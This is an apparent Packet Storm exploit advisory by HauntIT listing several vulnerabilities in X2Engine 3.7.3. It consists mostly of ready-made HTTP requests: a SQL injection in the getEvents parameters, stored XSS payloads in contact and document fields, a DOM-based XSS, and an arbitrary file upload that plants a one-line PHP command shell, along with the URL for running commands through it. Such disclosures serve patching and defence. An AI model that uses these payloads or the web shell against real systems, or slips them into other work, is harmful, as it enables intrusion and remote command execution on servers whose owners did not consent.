what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

X2Engine 3.7.3 Cross Site Scripting / Shell Upload / SQL Injection

X2Engine 3.7.3 Cross Site Scripting / Shell Upload / SQL Injection
Posted Feb 27, 2014
Authored by HauntIT

X2Engine version 3.7.3 suffers from cross site scripting, remote shell upload, and remote SQL injection vulnerabilities.

tags | exploit, remote, shell, vulnerability, xss, sql injection
SHA-256 | d3c14e2d6ce07bb3835b1588b086b2b1c63408940f717a399617a80e062e48bc

X2Engine 3.7.3 Cross Site Scripting / Shell Upload / SQL Injection

Change Mirror Download
# ==============================================================
# Title ...| Multiple vulnerabilities in X2Engine
# Version .| X2Engine 3.7.3
# Date ....| .02.2014
# Found ...| HauntIT Blog
# Home ....|
# ==============================================================

[+] For admin logged in

# ==============================================================
# 1. SQL Injection

---<request>---
GET /k/cms/x2/X2Engine-3.7.3/x2engine/index.php/profile/getEvents?lastEventId='mynameissqli&lastTimestamp=0&profileId=1&myProfileId=1 HTTP/1.1
Host: 10.149.14.62
(...)
Connection: close
---<request>---


Parameter "lastTimestamp" is also vulnerable.


# ==============================================================
# 2. XSS

---<request>---
POST /k/cms/x2/X2Engine-3.7.3/x2engine/index.php/contacts/create HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 917

Contacts%5BfirstName%5D='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&Contacts%5Btitle%5D=tester&Contacts%5Bphone%5D=&Contacts%5Bphone2%5D=&Contacts%5BdoNotCall%5D=0&Contacts%5BlastName%5D=tester&Contacts%5Bcompany_id%5D=&Contacts%5Bcompany%5D=&Contacts%5Bwebsite%5D=&Contacts%5Bemail%5D=&Contacts%5BdoNotEmail%5D=0&Contacts%5Bleadtype%5D=&Contacts%5BleadSource%5D=&Contacts%5Bleadstatus%5D=&Contacts%5BleadDate%5D=&Contacts%5Binterest%5D=&Contacts%5Bdealvalue%5D=%240.00&Contacts%5Bclosedate%5D=&Contacts%5Bdealstatus%5D=&Contacts%5Baddress%5D=&Contacts%5Baddress2%5D=&Contacts%5Bcity%5D=&Contacts%5Bstate%5D=&Contacts%5Bzipcode%5D=&Contacts%5Bcountry%5D=&Contacts%5BbackgroundInfo%5D=&Contacts%5Bskype%5D=&Contacts%5Blinkedin%5D=&Contacts%5Btwitter%5D=&Contacts%5Bfacebook%5D=&Contacts%5Bgoogleplus%5D=&Contacts%5BotherUrl%5D=&Contacts%5BassignedTo%5D=admin&Contacts%5Bpriority%5D=&Contacts%5Bvisibility%5D=1&yt0=Create
---<request>---

Also vulnerable: Contacts%5Bwebsite%5D, Contacts%5Bcompany%5D, Contacts%5Binterest%5D...


# ==============================================================
# 3. Arbitrary File Upload


---<request>---
POST /k/cms/x2/X2Engine-3.7.3/x2engine/index.php/media/ajaxUpload?CKEditor=input&CKEditorFuncNum=1&langCode=en HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 241

-----------------------------20967107015427
Content-Disposition: form-data; name="upload"; filename="mishell.php"
Content-Type: application/octet-stream

<?php system($_REQUEST['cmd']); ?>
-----------------------------20967107015427--

---<request>---

To access shell, go to:
http://10.149.14.62/(...)/X2Engine-3.7.3/x2engine/uploads/media/admin/mishell.php?cmd=id



# ==============================================================
# 4. DOM-based XSS

---<request>---
POST /k/cms/x2/X2Engine-3.7.3/x2engine/index.php/media/ajaxUpload?CKEditor=input&CKEditorFuncNum='');</script><script>alert(1)</script>&langCode=en HTTP/1.1
Host: 10.149.14.62
(...) <!-- yes, I know. This is the same request as [3] ;)
Content-Length: 241

-----------------------------20967107015427
Content-Disposition: form-data; name="upload"; filename="mishell.php"
Content-Type: application/octet-stream

<?php system($_REQUEST['cmd']); ?>
-----------------------------20967107015427--

---<request>---



# ==============================================================
# 5. XSS

---<request>---
POST /k/cms/x2/X2Engine-3.7.3/x2engine/index.php/docs/create HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 260

Docs%5Bname%5D='%3e"%3e%3cbody%2fonload%3dalert(991212129)%3e&Docs%5Bvisibility%5D=1&yt0=Create&Docs%5Btext%5D=%3Chtml%3E%0D%0A%3Chead%3E%0D%0A%09%3Ctitle%3E%3C%2Ftitle%3E%0D%0A%3C%2Fhead%3E%0D%0A%3Cbody%3Eaaaaaaaaaaaaaaaa%3C%2Fbody%3E%0D%0A%3C%2Fhtml%3E%0D%0A
---<request>---




# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    0 Files
  • 16
    Apr 16th
    0 Files
  • 17
    Apr 17th
    0 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close